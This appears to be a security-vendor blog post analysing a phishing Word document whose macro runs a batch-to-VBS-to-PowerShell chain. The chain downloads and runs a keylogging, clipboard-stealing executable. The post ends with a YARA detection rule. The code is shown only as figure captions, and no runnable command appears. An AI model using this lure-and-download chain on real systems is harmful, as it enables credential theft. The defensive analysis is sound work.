MS Word and Macros… Now With Social Engineering Malware

Share Now


On December 11, one of our employees reported a phishing  email with PhishMe’s Reporter for Outlook that contained a particularly nasty Word document. The malicious payload included PowerShell, VBA, and batch code. Here’s a screenshot of the phishing email:

Figure 1 -- Phishing Email
Figure 1 — Screenshot of phishing email

Once opened, the document’s contents are blurred, and it asks recipients to enable macros in order to view the document.

Figure 2 -- Social Engineering
Figure 2 — Document requesting that user enable macros

Once enabled, the macro kicks off by executing a batch script via cmd.exe, which then executes visual basic script, which in turn triggers a PowerShell script. (Figure 3.)

Figure 3 -- Chain of execution
Figure 3 — Chain of execution for Word document

The batch file is responsible for pinging twice, changing the console code to the Cyrillic script (chcp 1251), and running the second file, adobeacd-update.vbs. (Figure 4.)

Figure 4 -- Batch file
Figure 4 — Batch file exectued by macro

Next, the VBS file runs a powershell script with the command seen in Figure 5.

Figure 5 -- VBS file
Figure 5 — VBS file executing PowerShell script

The powershell code is where the malware is finally downloaded. First, the file downloads “x.exe” from the domain highlighted, then saves it to the system as the filename “444.exe”.

Figure 6 -- Powershell
Figure 6 — Excerpt of PowerShell script

Next, the script grabs the path name of the above scripts, saves them to a variable, sleeps for 15 seconds, and runs “444.exe”.

Figure 7 -- Powershell excerpt
Figure 7 — PowerShell excerpt that executes “444.exe”

Once executed, the powershell script attempts to clean up by removing the other scripts used to execute it.

Figure 8 -- attempted cleanup
Figure 8 — Attempted cleanup for the malware

By looking in Wireshark, we can see the file being downloaded in Figure 9.

Figure 9 -- Malware being downloaded
Figure 9 — Malware being downloaded

While the malware is packed, we can find some interesting things about the malware by analyzing the memory. First, by grepping before and after “eu”, attempt to POST to “/log/index.php”, and feed the information back containing the string “0USER0”. (Figure 10.)

Figure 10 -- memory
Figure 10 — Memory dump of data being collected

By looking at the pcap (Figure 11) and decoding the data (Figure 12) we can see that the data is presented exactly as seen in the pcap.

Figure 11
Figure 11 — Data from pcap
Figure 12 -- decoded data
Figure 12 — Decoded data from pcap

We can see that the malware is  capable of copying contents from the clipboard as well as logging keystrokes. This data is then POSTed back to the attackers domain.

For a Yara signature, the attackers included a “vbaProject.bin” file in the docx file. The following Yara rule can help to pick up variants that contain this:

rule PM_docx_with_vba_bin



$a1 = “PK”

$a2 = “word/_rels/vbaProject.bin”



$a1 at 0 and $a2


The word document has a very low detection rate (4/56) and can be found here:

Read More Related Phishing Blog Posts


We use our own and third-party cookies to enhance your experience by showing you relevant content, personalizing our communications with you, and remembering your preferences when you visit our website. We also use them to improve the overall performance of our site. You can learn more about the cookies and similar technology we use by viewing our privacy policy. By clicking ‘Accept,’ you acknowledge and consent to our use of all cookies on our website.

This site is registered on as a development site.